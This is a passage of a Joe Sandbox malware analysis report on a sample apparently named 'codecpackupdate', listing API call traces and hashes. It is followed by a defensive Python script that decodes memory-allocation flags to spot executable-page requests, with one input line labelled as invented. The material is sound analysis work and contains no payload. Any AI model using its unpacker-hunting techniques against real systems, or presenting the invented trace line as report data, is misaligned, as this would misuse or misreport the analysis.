                                                                          • API ID: AllocErrorH_prologLast
                                                                          • String ID: tss
                                                                          • API String ID: 249634027-1638339373
                                                                          • Opcode ID: d3e348341a44aa134a0d6e05a4e80a2d7e1aab49dbc470021b778a60d2bf4b3c
                                                                          • Instruction ID: bd6e0e0007d195f7be7d0b0baa3b9f13c47d217f604f1aa01114dd511e49c6aa
                                                                          • Opcode Fuzzy Hash: d3e348341a44aa134a0d6e05a4e80a2d7e1aab49dbc470021b778a60d2bf4b3c
                                                                          • Instruction Fuzzy Hash: 34E086319047149BC3007B78EC094DFBBA49A44371F10876AFDBE832D0EA30494187C6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3BD8
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 009F3BED
                                                                            • Part of subcall function 00A023F7: std::exception::exception.LIBCMT ref: 00A02401
                                                                            • Part of subcall function 009FA58A: __EH_prolog.LIBCMT ref: 009FA58F
                                                                            • Part of subcall function 009FA58A: __CxxThrowException@8.LIBCMT ref: 009FA5B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 9798f0f3abe1f87f7fdeb2dad17689a02efbb6fcbe975f865a0aee02a66046e3
                                                                          • Instruction ID: 42bfe73b73e20d68e6eaf3ceaad0a626efe8a46e3b0aa64a55cbc91f9ae943b2
                                                                          • Opcode Fuzzy Hash: 9798f0f3abe1f87f7fdeb2dad17689a02efbb6fcbe975f865a0aee02a66046e3
                                                                          • Instruction Fuzzy Hash: D7E01A71D14508DBC704EFA4E652BBCB774EF94301F008069EA065B2D0DB359A96CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction ID: ab7933d84ada2b962503ad88361c81f9e178ef349f2d38840b4e325d6782f2f4
                                                                          • Opcode Fuzzy Hash: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction Fuzzy Hash: 3E118F712003019FD7218F29EE459167BF5FB84765711853AF152E71B0C372D961CF1A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
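The allocation trace in the last APIs block is easier to read once the raw stack dwords are mapped onto the documented parameter order and the flag constants are given their names. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses API bullets in the shape the report prints them, decodes the VirtualAlloc and VirtualProtect arguments, and flags any call that asks for executable pages. The four report bullets are fed in as sample input together with one constructed VirtualProtect bullet (its addresses and ref are made up, not from the report) so the executable case is exercised. That the leading stack slots follow the documented parameter order is an assumption; it holds for the VirtualAlloc call shown, but the Heap* calls are deliberately left undecoded because the report lists stack slots rather than named parameters and the heap handle may or may not occupy the first slot.

```python
import re
from typing import Dict, List, Optional

# Standard Win32 constants (winnt.h); only the bits needed to read allocation traces.
MEM_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
            0x100000: "MEM_TOP_DOWN", 0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MOD = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXEC_BITS = 0x10 | 0x20 | 0x40 | 0x80

# One "APIs" bullet as Joe Sandbox prints it: "<Api>.<Module>(<hex args>), ref: <addr>".
# The argument list is the stack at the call site, so it may be longer than the API's
# parameter count and may contain "?" for values the analyser could not recover.
API_LINE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_api_line(line: str) -> Optional[dict]:
    """Return {'api', 'module', 'args', 'ref'} or None if the line is not an API bullet."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a, 16)
            for a in m.group("args").split(",") if a.strip()]
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def flag_names(value: int, table: Dict[int, str]) -> str:
    """Render an OR'd flag word as 'A|B', keeping bits the table does not know as hex."""
    names = [name for bit, name in table.items() if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:X}")
    return "|".join(names) or "0"


def protect_name(value: int) -> str:
    """Low byte is the exclusive PAGE_* base; higher bits are OR'd modifiers."""
    base = PAGE_BASE.get(value & 0xFF, f"0x{value & 0xFF:X}")
    mods = flag_names(value & ~0xFF, PAGE_MOD)
    return base if mods == "0" else f"{base}|{mods}"


def decode_memory_call(entry: dict) -> dict:
    """Map the leading stack slots onto the documented parameter order (assumed to hold)
    for VirtualAlloc/VirtualProtect and flag any request for executable pages."""
    api, args = entry["api"], entry["args"]
    out = {"api": api, "ref": f"{entry['ref']:08X}", "executable": False, "detail": None}
    if api == "VirtualAlloc" and len(args) >= 4 and None not in args[:4]:
        addr, size, mem_type, protect = args[:4]
        out["detail"] = (f"addr={'NULL' if addr == 0 else hex(addr)} size={hex(size)} "
                         f"type={flag_names(mem_type, MEM_TYPE)} protect={protect_name(protect)}")
        out["executable"] = bool(protect & EXEC_BITS)
    elif api == "VirtualProtect" and len(args) >= 3 and None not in args[:3]:
        addr, size, protect = args[:3]
        out["detail"] = f"addr={hex(addr)} size={hex(size)} new_protect={protect_name(protect)}"
        out["executable"] = bool(protect & EXEC_BITS)
    return out


# Constructed sample input: the four bullets from the report block above, plus one
# made-up VirtualProtect bullet (addresses and ref are NOT from the report) so that
# the executable-page case is exercised.
SAMPLE_TRACE = """
• HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
• HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
• HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
• VirtualProtect.KERNEL32(00401000,00008000,00000040,0019FF20), ref: 00401234
"""


def analyse(trace: str) -> List[dict]:
    entries = [e for e in map(parse_api_line, trace.splitlines()) if e]
    return [decode_memory_call(e) for e in entries]


def executable_refs(trace: str) -> List[str]:
    """Call-site addresses that request executable memory: where to break when hunting
    for an unpacker's destination buffer."""
    return [r["ref"] for r in analyse(trace) if r["executable"]]


if __name__ == "__main__":
    for r in analyse(SAMPLE_TRACE):
        mark = "EXEC" if r["executable"] else "    "
        print(f"{mark} {r['ref']} {r['api']:<13} {r['detail'] or ''}")
```

Run against the block above, the VirtualAlloc at ref 004039D2 decodes to a 1 MiB MEM_RESERVE of PAGE_READWRITE memory with no execute bit, which is what a heap or arena reservation looks like rather than an unpacking destination; the "changes PE section rights" behaviour flagged in the report summary would show up as a VirtualProtect (or a VirtualAlloc with an EXECUTE protection), which is what the executable flag is there to catch.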